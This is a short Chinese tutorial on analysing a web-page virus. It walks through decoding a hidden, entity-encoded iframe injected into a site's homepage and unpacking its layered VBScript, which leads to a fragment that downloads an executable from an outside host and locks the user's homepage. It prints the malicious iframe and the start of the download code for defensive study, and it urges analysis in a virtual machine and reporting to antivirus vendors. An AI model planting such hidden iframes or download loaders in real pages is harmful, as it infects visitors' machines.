面對網(wǎng)站惡意病毒我們該怎么辦？

　　提醒：分析病毒存在一定風(fēng)險，建議在虛擬機下操作。

　　第一步 查看病毒網(wǎng)站首頁的源代碼，可以發(fā)現(xiàn)在尾部有如下的字樣：

　　<iframe src=&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108 width=0 height=0></iframe>

　　這是一個嵌入到7b網(wǎng)址之家首頁的頁面，即打開網(wǎng)站也就同時打開了這個頁面。

　　而“&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108”表示的是一個字符串，“&#”后面是每個字符串ASCII的十進制值。

　　直接把這段亂碼保存為HTM文件，用IE打開，就可以看到它的真實面目“http : // m.dashow.com.cn / m.html”。

　　第二步 查看http : // m.dashow.com.cn / m.html的源代碼，把看的<scrtipt>腳本段中的Execute替換為Document.Write，然后打開這個HTM頁面，就會出現(xiàn)一段代碼，同樣地，把EXECUTE換成我們無敵的Document.Write，前后加腳本標(biāo)記，存HTM打開。屏幕上立即出現(xiàn)了一段令人眼花的東西。把眼花繚亂的東西整理一下，并將出現(xiàn)的CHR（）在前面用到過，作用是把字符的ASCII轉(zhuǎn)成字符，只不過這次是16進制。然后再將字符拼接成字符串，然后再Execute運行這個命令字符串。繼續(xù)用Document.Write替換掉EXECUTE，前后加腳本標(biāo)記，存HTM打開。

　　第三步 經(jīng)過上幾步的還原后終于看到了這個惡意頁面的最終面目。

　　on error resume next curl = "http : // m.dashow.com.cn / start.exe"……其后省略。

　　這段代碼中我們可以很清楚地看到http : // m.dashow.com.cn / start.exe這個鏈接。沒錯，它就是運行后可以將用戶主頁鎖定為網(wǎng)站的病毒。

　　可以用下載工具將這個文件下載下來，如果你的殺毒軟件查不到的話最好立即上報。這樣可以保證殺毒軟件快速查殺這個病毒，并使更少的網(wǎng)友免受該病毒的侵害。